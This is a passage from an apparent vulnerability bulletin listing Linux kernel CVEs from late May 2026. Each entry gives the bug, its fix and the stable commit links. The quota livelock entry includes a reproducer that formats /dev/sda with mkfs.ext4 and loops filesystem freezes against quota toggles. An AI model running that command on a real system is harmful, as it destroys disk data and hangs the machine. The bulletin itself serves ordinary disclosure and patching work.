https://git.kernel.org/stable/c/64303b92d94c0c7845a273acd8d84b796d6f1db7 https://git.kernel.org/stable/c/df10f23defff22c8d55fe6db74f6e4ce927145bf https://git.kernel.org/stable/c/b4af3806846778799cd4ab0766dc18341e777264 https://git.kernel.org/stable/c/d79b9097a6a2b91471b40755f1225364be5d85ff https://git.kernel.org/stable/c/3b56eb90feb8a3709417f5624f3871847d42bcb1 https://git.kernel.org/stable/c/3e6397b056335cc56ef0e9da36c95946a19f5118 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: st33zp24: Fix missing cleanup on get_burstcount() error get_burstcount() can return -EBUSY on timeout. When this happens, st33zp24_send() returns directly without releasing the locality acquired earlier. Use goto out_err to ensure proper cleanup when get_burstcount() fails. | 2026-05-27 | not yet calculated | CVE-2026-45871 | https://git.kernel.org/stable/c/e0ce3da82341fcd6194175f1837946b2a894c625 https://git.kernel.org/stable/c/7687133509cf66ced120b667fefd21f80bf17993 https://git.kernel.org/stable/c/1256c6dc96d1e687e6e9b63088156ed07411b00c https://git.kernel.org/stable/c/a51cff9be046e13e1c1b2fe45d5c48b582ec9b8c https://git.kernel.org/stable/c/cc09d55f519e15355de343264a22ac6682b8305e https://git.kernel.org/stable/c/ec15eb67fe9df87981b4829b901ec254273ca483 https://git.kernel.org/stable/c/4fffb77d35d038f146e6192da583dbe4971d869e https://git.kernel.org/stable/c/3e91b44c93ad2871f89fc2a98c5e4fe6ca5db3d9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: smartpqi: Fix memory leak in pqi_report_phys_luns() pqi_report_phys_luns() fails to release the rpl_list buffer when encountering an unsupported data format or when the allocation for rpl_16byte_wwid_list fails. These early returns bypass the cleanup logic, leading to memory leaks. Consolidate the error handling by adding an out_free_rpl_list label and use goto statements to ensure rpl_list is consistently freed on failure. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45872 | https://git.kernel.org/stable/c/f471ecfec093e39ef8fd08978413793087daa14d https://git.kernel.org/stable/c/fdf1188cfa80f88c9f18d58cb33d57ff40e70e26 https://git.kernel.org/stable/c/d52e13122d3771f753dd73ae6512fa01f58015cb https://git.kernel.org/stable/c/e5579ebaadc7b699868dad0f591a7bf83cd647e1 https://git.kernel.org/stable/c/454570434114e4862767f506a442a0f110b639b2 https://git.kernel.org/stable/c/41b37312bd9722af77ec7817ccf22d7a4880c289 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_rbtree: check for partial overlaps in anonymous sets Userspace provides an optimized representation in case intervals are adjacent, where the end element is omitted. The existing partial overlap detection logic skips anonymous set checks on start elements for this reason. However, it is possible to add intervals that overlap to this anonymous where two start elements with the same, eg. A-B, A-C where C < B. start end A B start end A C Restore the check on overlapping start elements to report an overlap. | 2026-05-27 | not yet calculated | CVE-2026-45873 | https://git.kernel.org/stable/c/7ca5813e1b21ef300e04593f47b073ef3217aac6 https://git.kernel.org/stable/c/029e5f6a95e905b12d6bc20421be32a01e0eb311 https://git.kernel.org/stable/c/f1381ce0a1dd013610985e1c4260908163a427df https://git.kernel.org/stable/c/f1535d56fc3f6c625b7e0559c006bd0318791bb1 https://git.kernel.org/stable/c/05feaf826390fd16f1deb89dd9412def3b2a280f https://git.kernel.org/stable/c/dad14d22dff1a191612acb98facceb303d0524a2 https://git.kernel.org/stable/c/e6497e06a102870803a59570d75ed2c36d7e11b3 https://git.kernel.org/stable/c/4780ec142cbb24b794129d3080eee5cac2943ffc |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: phy: freescale: imx8qm-hsio: fix NULL pointer dereference During the probe the refclk_pad pointer is set to NULL if the 'fsl,refclk-pad-mode' property is not defined in the devicetree node. But in imx_hsio_configure_clk_pad() this pointer is unconditionally used which could result in a NULL pointer dereference. So check the pointer before to use it. | 2026-05-27 | not yet calculated | CVE-2026-45874 | https://git.kernel.org/stable/c/a771b386cb6c6e582e7b50f8eeff3347ff887f71 https://git.kernel.org/stable/c/dd8b9ba3d9701832cfb5dcefd8b43250df28dbc2 https://git.kernel.org/stable/c/8d29e81e9cdec84d4b9acb1736550d35e86c88af https://git.kernel.org/stable/c/4dd5d4c0361af0a3fd24f45c815996abf4429770 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mfd: arizona: Fix regulator resource leak on wm5102_clear_write_sequencer() failure The wm5102_clear_write_sequencer() helper may return an error and just return, bypassing the cleanup sequence and causing regulators to remain enabled, leading to a resource leak. Change the direct return to jump to the err_reset label to properly free the resources. | 2026-05-27 | not yet calculated | CVE-2026-45875 | https://git.kernel.org/stable/c/54eafc1b0dbcf79c5f8b6dc8d9e92e56b9384c0a https://git.kernel.org/stable/c/933c5463873582baaecf5c38401ec4095b1c6269 https://git.kernel.org/stable/c/445cec7b4fbb1546836ae8e332d158e8d37d0fb6 https://git.kernel.org/stable/c/3ea01691738b0decb63ea2705d2cdf27f6f26fc0 https://git.kernel.org/stable/c/e0527c09bcf1e6beeb685a7f4177683866b8609c https://git.kernel.org/stable/c/5a4923726a165593d7601834a6fb2a10ab47b85d https://git.kernel.org/stable/c/2049820d1e635e467d795237fd40287213d92349 https://git.kernel.org/stable/c/4feb753ba6e5e5bbaba868b841a2db41c21e56fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: arm64/gcs: Fix error handling in arch_set_shadow_stack_status() alloc_gcs() returns an error-encoded pointer on failure, which comes from do_mmap(), not NULL. The current NULL check fails to detect errors, which could lead to using an invalid GCS address. Use IS_ERR_VALUE() to properly detect errors, consistent with the check in gcs_alloc_thread_stack(). | 2026-05-27 | not yet calculated | CVE-2026-45876 | https://git.kernel.org/stable/c/c787a235deb33be6eda40beee8f561da5fd8cb8c https://git.kernel.org/stable/c/a4741114c9622346c4bbb8cc2bbd88153616ffaf https://git.kernel.org/stable/c/53c998527ffa60f9deda8974a11ad39790684159 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: HID: intel-ish-hid: fix NULL-ptr-deref in ishtp_bus_remove_all_clients During a warm reset flow, the cl->device pointer may be NULL if the reset occurs while clients are still being enumerated. Accessing cl->device->reference_count without a NULL check leads to a kernel panic. This issue was identified during multi-unit warm reboot stress clycles. Add a defensive NULL check for cl->device to ensure stability under such intensive testing conditions. KASAN: null-ptr-deref in range [0000000000000000-0000000000000007] Workqueue: ish_fw_update_wq fw_reset_work_fn Call Trace: ishtp_bus_remove_all_clients+0xbe/0x130 [intel_ishtp] ishtp_reset_handler+0x85/0x1a0 [intel_ishtp] fw_reset_work_fn+0x8a/0xc0 [intel_ish_ipc] | 2026-05-27 | not yet calculated | CVE-2026-45877 | https://git.kernel.org/stable/c/0b605e8ce60698c27a26f512968a597fd620d2e8 https://git.kernel.org/stable/c/feb4bcfd405282de60aba321f13a1272b30c5af4 https://git.kernel.org/stable/c/272dac57caa981718e7188c80c703e7bb1998054 https://git.kernel.org/stable/c/56f7db581ee73af53cd512e00a6261a025bf1d58 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: bq25980: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45879 | https://git.kernel.org/stable/c/86f93dfb23f5bf4f285c4256a7e909d222f7de56 https://git.kernel.org/stable/c/16875e3b7bc9e59bfa0acaf1e43f275a6f42a30f https://git.kernel.org/stable/c/0560a4b09c92e2ecaa883965cf6f9ca51c158ff9 https://git.kernel.org/stable/c/0de95d29d847c6217b7d5845e24a71a4aee7b359 https://git.kernel.org/stable/c/4aeaf03c17260415c2fdd55992f9ad4188d5455a https://git.kernel.org/stable/c/03d1e4ee4e6aa6d2966e883e4ca0e5be73bf1b7c https://git.kernel.org/stable/c/abea607ff2f62f4c0a5fb29f7fbdaaab163276a4 https://git.kernel.org/stable/c/5f0b1cb41906e86b64bf69f5ededb83b0d757c27 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: PCI/P2PDMA: Release per-CPU pgmap ref when vm_insert_page() fails When vm_insert_page() fails in p2pmem_alloc_mmap(), p2pmem_alloc_mmap() doesn't invoke percpu_ref_put() to free the per-CPU ref of pgmap acquired after gen_pool_alloc_owner(), and memunmap_pages() will hang forever when trying to remove the PCI device. Fix it by adding the missed percpu_ref_put(). | 2026-05-27 | not yet calculated | CVE-2026-45880 | https://git.kernel.org/stable/c/baa42b756d183a59572f3890981a3d32b8d05d40 https://git.kernel.org/stable/c/51b7181cfbedf289ce794b6d97a1c596c309ec38 https://git.kernel.org/stable/c/e19cce88ec4c4877f4ff2469099b9cf23cc3e93e https://git.kernel.org/stable/c/a1f4dc72efc3204db95d052058d785cad7ce755f https://git.kernel.org/stable/c/6220694c52a5a04102b48109e4f24e958b559bd3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: soc: mediatek: svs: Fix memory leak in svs_enable_debug_write() In svs_enable_debug_write(), the buf allocated by memdup_user_nul() is leaked if kstrtoint() fails. Fix this by using __free(kfree) to automatically free buf, eliminating the need for explicit kfree() calls and preventing leaks. [Angelo: Added missing cleanup.h inclusion] | 2026-05-27 | not yet calculated | CVE-2026-45881 | https://git.kernel.org/stable/c/47a3e372f7d68776adb749a27c0ec9058ff1b4fd https://git.kernel.org/stable/c/06195456c4e4de3826c4ca60eca941c472f991d0 https://git.kernel.org/stable/c/a58c97828911c0b6e25d6b556789da974003efda https://git.kernel.org/stable/c/0f6498077faa9cd89bb787bcc57063494a6f0601 https://git.kernel.org/stable/c/6bb10466e0884b4a68d4a1f3f4bb87eeb471c18a https://git.kernel.org/stable/c/6259094ee806fb813ca95894c65fb80e2ec98bf1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: pm8916_bms_vm: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45882 | https://git.kernel.org/stable/c/b69bb88e20c6f8e998dff3e13a316207f49d3fa2 https://git.kernel.org/stable/c/a8b7117ae3a791c6a328674d05a06cd45d8241bd https://git.kernel.org/stable/c/17db6b3abd823c9fba3f3413c4f0f432d99d49dc https://git.kernel.org/stable/c/62914959b35e9a1e29cc0f64cb8cfc5075a5366f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: sca3000: Fix a resource leak in sca3000_probe() spi->irq from request_threaded_irq() not released when iio_device_register() fails. Add an return value check and jump to a common error handler when iio_device_register() fails. | 2026-05-27 | not yet calculated | CVE-2026-45883 | https://git.kernel.org/stable/c/55e13abf22c27a3b0ab5cf941dd07a2d9786736c https://git.kernel.org/stable/c/40c860ece22542178cddcf01b08644bcdbc597b3 https://git.kernel.org/stable/c/597d749c5180f3e351837e851a6131b140324e9f https://git.kernel.org/stable/c/e8e960c3d23fdb4882d70d34ce762368da0f1427 https://git.kernel.org/stable/c/103ac8e3a7f345a0966ef582b8a874ac31a92c7c https://git.kernel.org/stable/c/517d9f2b963089b3d64c23accf7920d77f5a30c8 https://git.kernel.org/stable/c/84d3c396d8ae73c24dececfcc4e544ea09311e32 https://git.kernel.org/stable/c/62b44ebc1f2c71db3ca2d4737c52e433f6f03038 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: avoid per-cpu hold underflow in aa_get_buffer When aa_get_buffer() pulls from the per-cpu list it unconditionally decrements cache->hold. If hold reaches 0 while count is still non-zero, the unsigned decrement wraps to UINT_MAX. This keeps hold non-zero for a very long time, so aa_put_buffer() never returns buffers to the global list, which can starve other CPUs and force repeated kmalloc(aa_g_path_max) allocations. Guard the decrement so hold never underflows. | 2026-05-27 | not yet calculated | CVE-2026-45884 | https://git.kernel.org/stable/c/202824a1f89a9786c20a3d646a7c88d223abb1b2 https://git.kernel.org/stable/c/80c334acc6d0bee8605a358a33e69b4aea1ffb92 https://git.kernel.org/stable/c/4bcddd0f6b2e52b4c7b520e4d36a115caf5b7169 https://git.kernel.org/stable/c/640cf2f09575c9dc344b3f7be2498d31e3923ead |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: power: supply: cpcap-battery: Fix use-after-free in power_supply_changed() Using the `devm_` variant for requesting IRQ _before_ the `devm_` variant for allocating/registering the `power_supply` handle, means that the `power_supply` handle will be deallocated/unregistered _before_ the interrupt handler (since `devm_` naturally deallocates in reverse allocation order). This means that during removal, there is a race condition where an interrupt can fire just _after_ the `power_supply` handle has been freed, *but* just _before_ the corresponding unregistration of the IRQ handler has run. This will lead to the IRQ handler calling `power_supply_changed()` with a freed `power_supply` handle. Which usually crashes the system or otherwise silently corrupts the memory... Note that there is a similar situation which can also happen during `probe()`; the possibility of an interrupt firing _before_ registering the `power_supply` handle. This would then lead to the nasty situation of using the `power_supply` handle *uninitialized* in `power_supply_changed()`. Fix this racy use-after-free by making sure the IRQ is requested _after_ the registration of the `power_supply` handle. | 2026-05-27 | not yet calculated | CVE-2026-45885 | https://git.kernel.org/stable/c/c549dd3de4b3f6e726d1b8386d40ccf7d3abdbe4 https://git.kernel.org/stable/c/3ff75cba1c98349a23a8f9333981deba1972cc11 https://git.kernel.org/stable/c/2ce2334be155bd8bad6377e99984246ce4dbd08c https://git.kernel.org/stable/c/cbb9b07f88a9ef6518934c41eb3e8cf840d657d5 https://git.kernel.org/stable/c/f3fbe309c9bfe1aac1e2b26543e9dc4829f3275a https://git.kernel.org/stable/c/2841bbb5a35c4449c0a0458e8e476b2a62f95147 https://git.kernel.org/stable/c/e261be6f18929f2397cd54cd583a2df624c129c1 https://git.kernel.org/stable/c/642f33e34b969eedec334738fd5df95d2dc42742 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Fix bpf_xdp_store_bytes proto for read-only arg While making some maps in Cilium read-only from the BPF side, we noticed that the bpf_xdp_store_bytes proto is incorrect. In particular, the verifier was throwing the following error: ; ret = ctx_store_bytes(ctx, l3_off + offsetof(struct iphdr, saddr), &nat->address, 4, 0); 635: (79) r1 = *(u64 *)(r10 -144) ; R1=ctx() R10=fp0 fp-144=ctx() 636: (b4) w2 = 26 ; R2=26 637: (b4) w4 = 4 ; R4=4 638: (b4) w5 = 0 ; R5=0 639: (85) call bpf_xdp_store_bytes#190 write into map forbidden, value_size=6 off=0 size=4 nat comes from a BPF_F_RDONLY_PROG map, so R3 is a PTR_TO_MAP_VALUE. The verifier checks the helper's memory access to R3 in check_mem_size_reg, as it reaches ARG_CONST_SIZE argument. The third argument has expected type ARG_PTR_TO_UNINIT_MEM, which includes the MEM_WRITE flag. The verifier thus checks for a BPF_WRITE access on R3. Given R3 points to a read-only map, the check fails. Conversely, ARG_PTR_TO_UNINIT_MEM can also lead to the helper reading from uninitialized memory. This patch simply fixes the expected argument type to match that of bpf_skb_store_bytes. | 2026-05-27 | not yet calculated | CVE-2026-45886 | https://git.kernel.org/stable/c/ffb5d1c5e3933b947fc7303ad68bf0c536d0c85e https://git.kernel.org/stable/c/ddc34a1b85505c919026ddc82fafdada9a160b15 https://git.kernel.org/stable/c/0db169a91381a473b7974021d1c02f8da72c5775 https://git.kernel.org/stable/c/d7b87adeb0eb539b9b824b101bb14fb01e41240b https://git.kernel.org/stable/c/57f7f6a0ad04a65c8a7a067b2f56cbbf2aec9e52 https://git.kernel.org/stable/c/6557f1565d779851c4db9c488c49c05a47a6e72f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: af_unix: Fix memleak of newsk in unix_stream_connect(). When prepare_peercred() fails in unix_stream_connect(), unix_release_sock() is not called for newsk, and the memory is leaked. Let's move prepare_peercred() before unix_create1(). | 2026-05-27 | not yet calculated | CVE-2026-45887 | https://git.kernel.org/stable/c/365996a2b14d07caa9e33d367b67ea26c09d89b4 https://git.kernel.org/stable/c/a5d95d7caba0160fb7b2b8d2bd96d5a1be861d9f https://git.kernel.org/stable/c/6884028cd7f275f8bcb854a347265cb1fb0e4bea |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid1: fix memory leak in raid1_run() raid1_run() calls setup_conf() which registers a thread via md_register_thread(). If raid1_set_limits() fails, the previously registered thread is not unregistered, resulting in a memory leak of the md_thread structure and the thread resource itself. Add md_unregister_thread() to the error path to properly cleanup the thread, which aligns with the error handling logic of other paths in this function. Compile tested only. Issue found using a prototype static analysis tool and code review. | 2026-05-27 | not yet calculated | CVE-2026-45888 | https://git.kernel.org/stable/c/c94fd6e8a71efd047ff36930e840f3c25679e136 https://git.kernel.org/stable/c/ec10e3dc93994b87adf7c759a4639fe34013989a https://git.kernel.org/stable/c/b37588b0282a2b3cdda9db1d53712745ce66dea0 https://git.kernel.org/stable/c/6abc7d5dcf0ee0f85e16e41c87fbd06231f28753 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: do not account for OoO in mptcp_rcvbuf_grow() MPTCP-level OoOs are physiological when multiple subflows are active concurrently and will not cause retransmissions nor are caused by drops. Accounting for them in mptcp_rcvbuf_grow() causes the rcvbuf slowly drifting towards tcp_rmem[2]. Remove such accounting. Note that subflows will still account for TCP-level OoO when the MPTCP-level rcvbuf is propagated. This also closes a subtle and very unlikely race condition with rcvspace init; active sockets with user-space holding the msk-level socket lock, could complete such initialization in the receive callback, after that the first OoO data reaches the rcvbuf and potentially triggering a divide by zero Oops. | 2026-05-27 | not yet calculated | CVE-2026-45889 | https://git.kernel.org/stable/c/fb7bf00b04a6b48859f52035d4e745848c2b4c79 https://git.kernel.org/stable/c/400ee4854adef1e4983812a3decf6717ea020136 https://git.kernel.org/stable/c/6b329393502e5857662b851a13f947209c588587 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: xen-netback: reject zero-queue configuration from guest A malicious or buggy Xen guest can write "0" to the xenbus key "multi-queue-num-queues". The connect() function in the backend only validates the upper bound (requested_num_queues > xenvif_max_queues) but not zero, allowing requested_num_queues=0 to reach vzalloc(array_size(0, sizeof(struct xenvif_queue))), which triggers WARN_ON_ONCE(!size) in __vmalloc_node_range(). On systems with panic_on_warn=1, this allows a guest-to-host denial of service. The Xen network interface specification requires the queue count to be "greater than zero". Add a zero check to match the validation already present in xen-blkback, which has included this guard since its multi-queue support was added. | 2026-05-27 | not yet calculated | CVE-2026-45890 | https://git.kernel.org/stable/c/2993e0f904c45f8af12917344bb1cac7ccd05a60 https://git.kernel.org/stable/c/787bfa423228c4b02ba3368128f625d579085353 https://git.kernel.org/stable/c/ce66d6786de45b7ed9cbbdc0988054bf09e58f54 https://git.kernel.org/stable/c/88b0fced1bbbfdb356a007592604008ffc93a6a1 https://git.kernel.org/stable/c/ec4859ac5c933e3315543a61adc1ca4358006a41 https://git.kernel.org/stable/c/654780dee9eae419e1648ea58462c4efe54518fa https://git.kernel.org/stable/c/d99f69ddc70fd9f4b8148add62209a1a8eb5c615 https://git.kernel.org/stable/c/6d1dc8014334c7fb25719999bca84d811e60a559 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: hns3: fix double free issue for tx spare buffer In hns3_set_ringparam(), a temporary copy (tmp_rings) of the ring structure is created for rollback. However, the tx_spare pointer in the original ring handle is incorrectly left pointing to the old backup memory. Later, if memory allocation fails in hns3_init_all_ring() during the setup, the error path attempts to free all newly allocated rings. Since tx_spare contains a stale (non-NULL) pointer from the backup, it is mistaken for a newly allocated buffer and is erroneously freed, leading to a double-free of the backup memory. The root cause is that the tx_spare field was not cleared after its value was saved in tmp_rings, leaving a dangling pointer. Fix this by setting tx_spare to NULL in the original ring structure when the creation of the new `tx_spare` fails. This ensures the error cleanup path only frees genuinely newly allocated buffers. | 2026-05-27 | not yet calculated | CVE-2026-45891 | https://git.kernel.org/stable/c/fb6a4c376d454b425555b1b0bda36e99f56ec307 https://git.kernel.org/stable/c/43015461662d41dcfb3bb95fadd8a2a42ad8eacf https://git.kernel.org/stable/c/6dc10494cfe27b6f1e9adb7e293293ae39c50b7c https://git.kernel.org/stable/c/d2c785733dfb853ea0b53984c75662a1af230a94 https://git.kernel.org/stable/c/fdbccddb7e7822016601829f95de4008e193f7bc https://git.kernel.org/stable/c/c3659273860bed0c8e573b865e3769abc51225a8 https://git.kernel.org/stable/c/6d2f142b1e4b203387a92519d9d2e34752a79dbb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: drop extent cache after doing PARTIAL_VALID1 zeroout When splitting an unwritten extent in the middle and converting it to initialized in ext4_split_extent() with the EXT4_EXT_MAY_ZEROOUT and EXT4_EXT_DATA_VALID2 flags set, it could leave a stale unwritten extent. Assume we have an unwritten file and buffered write in the middle of it without dioread_nolock enabled, it will allocate blocks as written extent. 0 A B N [UUUUUUUUUUUU] on-disk extent U: unwritten extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDD--] D: valid data |<- ->| ----> this range needs to be initialized ext4_split_extent() first try to split this extent at B with EXT4_EXT_DATA_PARTIAL_VALID1 and EXT4_EXT_MAY_ZEROOUT flag set, but ext4_split_extent_at() failed to split this extent due to temporary lack of space. It zeroout B to N and leave the entire extent as unwritten. 0 A B N [UUUUUUUUUUUU] on-disk extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDDZZ] Z: zeroed data ext4_split_extent() then try to split this extent at A with EXT4_EXT_DATA_VALID2 flag set. This time, it split successfully and leave an written extent from A to N. 0 A B N [UUWWWWWWWWWW] on-disk extent W: written extent [UUUUUUUUUUUU] extent status tree [--DDDDDDDDZZ] Finally ext4_map_create_blocks() only insert extent A to B to the extent status tree, and leave an stale unwritten extent in the status tree. 0 A B N [UUWWWWWWWWWW] on-disk extent W: written extent [UUWWWWWWWWUU] extent status tree [--DDDDDDDDZZ] Fix this issue by always cached extent status entry after zeroing out the second part. | 2026-05-27 | not yet calculated | CVE-2026-45892 | https://git.kernel.org/stable/c/28db4bfc6f82fd20e2aadb7fc162244109a4eb31 https://git.kernel.org/stable/c/f0931a5c17005a0c4fc35bd1a001245effc3354b https://git.kernel.org/stable/c/d8ee559fccdef713f058cfe5f2c03dc9b18be3b1 https://git.kernel.org/stable/c/c2ee51d684adca7645e4aa74adca13f6750390bc https://git.kernel.org/stable/c/a1b962a821e7a52d48212ae269b45808b4411267 https://git.kernel.org/stable/c/6d882ea3b0931b43530d44149b79fcd4ffc13030 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: Fix & Optimize table creation from possibly unaligned memory Source blob may come from userspace and might be unaligned. Try to optize the copying process by avoiding unaligned memory accesses. - Added Fixes tag - Added "Fix &" to description as this doesn't just optimize but fixes a potential unaligned memory access [jj: remove duplicate word "convert" in comment trigger checkpatch warning] | 2026-05-27 | not yet calculated | CVE-2026-45893 | https://git.kernel.org/stable/c/47e351dfef60ab0e3285133556e1a9c7f646a969 https://git.kernel.org/stable/c/e027999049c493fb728ead5a90db76942181a935 https://git.kernel.org/stable/c/226c3b10aab23f73b03c47e7773107de56ba3a4e https://git.kernel.org/stable/c/6fc367bfd4c8886e6b1742aabbd1c0bdc310db3a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: quota: fix livelock between quotactl and freeze_super When a filesystem is frozen, quotactl_block() enters a retry loop waiting for the filesystem to thaw. It acquires s_umount, checks the freeze state, drops s_umount and uses sb_start_write() - sb_end_write() pair to wait for the unfreeze. However, this retry loop can trigger a livelock issue, specifically on kernels with preemption disabled. The mechanism is as follows: 1. freeze_super() sets SB_FREEZE_WRITE and calls sb_wait_write(). 2. sb_wait_write() calls percpu_down_write(), which initiates synchronize_rcu(). 3. Simultaneously, quotactl_block() spins in its retry loop, immediately executing the sb_start_write() - sb_end_write() pair. 4. Because the kernel is non-preemptible and the loop contains no scheduling points, quotactl_block() never yields the CPU. This prevents that CPU from reaching an RCU quiescent state. 5. synchronize_rcu() in the freezer thread waits indefinitely for the quotactl_block() CPU to report a quiescent state. 6. quotactl_block() spins indefinitely waiting for the freezer to advance, which it cannot do as it is blocked on the RCU sync. This results in a hang of the freezer process and 100% CPU usage by the quota process. While this can occur intermittently on multi-core systems, it is reliably reproducing on a node with the following script, running both the freezer and the quota toggle on the same CPU: # mkfs.ext4 -O quota /dev/sda 2g && mkdir a_mount # mount /dev/sda -o quota,usrquota,grpquota a_mount # taskset -c 3 bash -c "while true; do xfs_freeze -f a_mount; \ xfs_freeze -u a_mount; done" & # taskset -c 3 bash -c "while true; do quotaon a_mount; \ quotaoff a_mount; done" & Adding cond_resched() to the retry loop fixes the issue. It acts as an RCU quiescent state, allowing synchronize_rcu() in percpu_down_write() to complete. | 2026-05-27 | not yet calculated | CVE-2026-45895 | https://git.kernel.org/stable/c/37ccd48cf35f3c8b9f2ea961a7b486b91eb71a82 https://git.kernel.org/stable/c/414259caf81a397563fc9baca9c0ef856c4a97cf https://git.kernel.org/stable/c/02bb1500f1479750e6557c8044f6a2d7e9d30c12 https://git.kernel.org/stable/c/53b2314b26b6640a3657cc924de63a1a8f26ac4d https://git.kernel.org/stable/c/77449e453dfc006ad738dec55374c4cbc056fd39 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: intel-dg: Fix accessing regions before setting nregions The regions array is counted by nregions, but it's set only after accessing it: [] UBSAN: array-index-out-of-bounds in drivers/mtd/devices/mtd_intel_dg.c:750:15 [] index 0 is out of range for type '<unknown> [*]' Fix it by also fixing an undesired behavior: the loop silently ignores ENOMEM and continues setting the other entries. | 2026-05-27 | not yet calculated | CVE-2026-45896 | https://git.kernel.org/stable/c/721bd22bcf45a63ebd9bd0f478ef721b45cc5383 https://git.kernel.org/stable/c/d58fca8513414b15387460b14a7a0a30405b9c9e https://git.kernel.org/stable/c/779c59274d03cc5c07237a2c845dfb71cff77705 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_counter: serialize reset with spinlock Add a global static spinlock to serialize counter fetch+reset operations, preventing concurrent dump-and-reset from underrunning values. The lock is taken before fetching the total so that two parallel resets cannot both read the same counter values and then both subtract them. A global lock is used for simplicity since resets are infrequent. If this becomes a bottleneck, it can be replaced with a per-net lock later. | 2026-05-27 | not yet calculated | CVE-2026-45897 | https://git.kernel.org/stable/c/0cdc6d5a26f2d1f7f15a43526841b679445c32e2 https://git.kernel.org/stable/c/779c60a5190c42689534172f4b49e927c9959e4e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: drop extent cache when splitting extent fails When the split extent fails, we might leave some extents still being processed and return an error directly, which will result in stale extent entries remaining in the extent status tree. So drop all of the remaining potentially stale extents if the splitting fails. | 2026-05-27 | not yet calculated | CVE-2026-45899 | https://git.kernel.org/stable/c/6e54f8dfee359bbd58086c883ea8cffd5312999d https://git.kernel.org/stable/c/337506dc652383c80839edb8d8dcdd8ff2129b4f https://git.kernel.org/stable/c/dc7c9b9d03a59a7fe483574531327e650a4b4adc https://git.kernel.org/stable/c/120c6bd7ca9d3e80a968b758cbb3fbd67570f132 https://git.kernel.org/stable/c/808f3191498f300174523c54cab101e18795ae4e https://git.kernel.org/stable/c/31bf37cf53ede8145e2bc62da803d4506da92975 https://git.kernel.org/stable/c/79b592e8f1b435796cbc2722190368e3e8ffd7a1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: caam - fix netdev memory leak in dpaa2_caam_probe When commit 0e1a4d427f58 ("crypto: caam: Unembed net_dev structure in dpaa2") converted embedded net_device to dynamically allocated pointers, it added cleanup in dpaa2_dpseci_disable() but missed adding cleanup in dpaa2_dpseci_free() for error paths. This causes memory leaks when dpaa2_dpseci_dpio_setup() fails during probe due to DPIO devices not being ready yet. The kernel's deferred probe mechanism handles the retry successfully, but the netdevs allocated during the failed probe attempt are never freed, resulting in kmemleak reports showing multiple leaked netdev-related allocations all traced back to dpaa2_caam_probe(). Fix this by preserving the CPU mask of allocated netdevs during setup and using it for cleanup in dpaa2_dpseci_free(). This approach ensures that only the CPUs that actually had netdevs allocated will be cleaned up, avoiding potential issues with CPU hotplug scenarios. | 2026-05-27 | not yet calculated | CVE-2026-45900 | https://git.kernel.org/stable/c/d5c6f254528caf78d5de7d9646dc21c81d351827 https://git.kernel.org/stable/c/d7decb572b55d2af33e59e9858fcee5d9ae69175 https://git.kernel.org/stable/c/e144cce29851610ce9c6eda405ce21118779aa51 https://git.kernel.org/stable/c/7d43252b3060b0ba4a192dce5dba85a3f39ffe39 |
